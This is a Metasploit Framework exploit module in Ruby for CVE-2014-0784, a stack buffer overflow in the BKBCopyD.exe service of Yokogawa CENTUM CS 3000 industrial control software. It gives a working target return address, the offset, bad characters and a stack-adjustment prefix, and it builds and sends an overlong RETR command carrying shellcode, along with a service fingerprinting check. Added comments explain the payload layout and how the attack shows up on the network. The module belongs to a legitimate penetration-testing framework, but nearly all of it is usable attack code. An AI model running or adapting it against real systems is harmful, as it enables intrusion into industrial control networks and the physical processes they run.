GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (product and version, the vendor advisory and
  # CVE in 'References', payload constraints, the single target) and the default
  # RPORT of 20111 used by both check and exploit.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow',
        'Description' => %q{
          This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
          exists in the service BKBCopyD.exe when handling specially crafted packets. This module has
          been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.
        },
        'Author' => [
          'juan vazquez',
          'Redsadic <julian.vilas[at]gmail.com>'
        ],
        'References' => [
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ],
          [ 'CVE', '2014-0784']
        ],
        'Payload' => {
          # 373 bytes of encoded payload; together with the 123-byte 'Offset'
          # filler and the 4-byte return address the RETR argument is 500 bytes.
          'Space' => 373, # 500 for the full RETR argument
          'DisableNops' => true,
          # Bytes the encoder must keep out of the payload; note that they include
          # the line terminators \x0d\x0a, and the request built in exploit is
          # itself terminated by "\n".
          'BadChars' => "\x00\x0d\x0a\xff",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff\xff\xff" # Stack adjustment # add esp, -3500 # double \xff char to put it on memory
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3',
            {
              'Ret' => 0x6404625d, # push esp # ret # libBKBUtil.dll]
              'Offset' => 123 # bytes of filler placed before the return address (see exploit)
            }
          ],
        ],
        'DisclosureDate' => '2014-03-10',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(20111)
      ]
    )
  end

  # Fingerprints the service: sends the random line from build_probe and
  # reports Detected when the reply carries the parser error string matched by
  # valid_response?. Only the presence of a BKBCopyD-style listener is confirmed,
  # never the overflow itself, which is why the result is Detected rather than
  # Vulnerable; an empty or non-matching reply yields Safe.
  #
  # @return [Exploit::CheckCode]
  def check
    pkt = build_probe
    res = send_pkt(pkt)
    if valid_response?(res)
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Sends the overflow as one RETR command line:
  #   "RETR " + target['Offset'] random filler bytes
  #          + target.ret as a 32-bit little-endian value (pack("V"))
  #          + payload.encoded + "\n"
  # With Offset 123 and Space 373 the RETR argument is up to 500 bytes long; an
  # overlong RETR line on the configured port (20111 by default) is the
  # on-the-wire pattern a network monitor can alert on. The socket is closed
  # right after the write; nothing is read back.
  def exploit
    data = "RETR "
    data << rand_text(target['Offset'])
    data << [target.ret].pack("V")
    data << payload.encoded
    data << "\n"

    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
    connect
    sock.put(data)
    disconnect
  end

  # Probe line used by check: ten random alphabetic characters plus a newline,
  # i.e. a line the service is expected to reject as an unknown command (see the
  # string matched in valid_response?).
  #
  # @return [String]
  def build_probe
    "#{rand_text_alpha(10)}\n"
  end

  # Connects, writes +data+, reads a single response with sock.get_once and
  # disconnects, returning the response.
  #
  # @param data [String] bytes to send
  # @return [String, nil] whatever get_once returned (may be nil when nothing
  #   was read; valid_response? tolerates that)
  #
  # NOTE(review): there is no ensure block, so if put or get_once raises the
  # disconnect is skipped; whether the framework closes the socket on the
  # module's behalf is not visible from this file. The parameter +data+ is also
  # reused to hold the reply, which reads oddly.
  def send_pkt(data)
    connect
    sock.put(data)
    data = sock.get_once
    disconnect

    return data
  end

  # True only when +data+ is present and contains the BKBCopyD parser error
  # "500 'yyparse error': command not understood"; this substring is the whole
  # basis of the check method's detection.
  #
  # @param data [String, nil] reply captured by send_pkt
  # @return [Boolean]
  def valid_response?(data)
    # `!!data` only coerces to a boolean; `return false unless data` is equivalent.
    return false unless !!data
    return false unless data =~ /500 'yyparse error': command not understood/

    return true
  end
end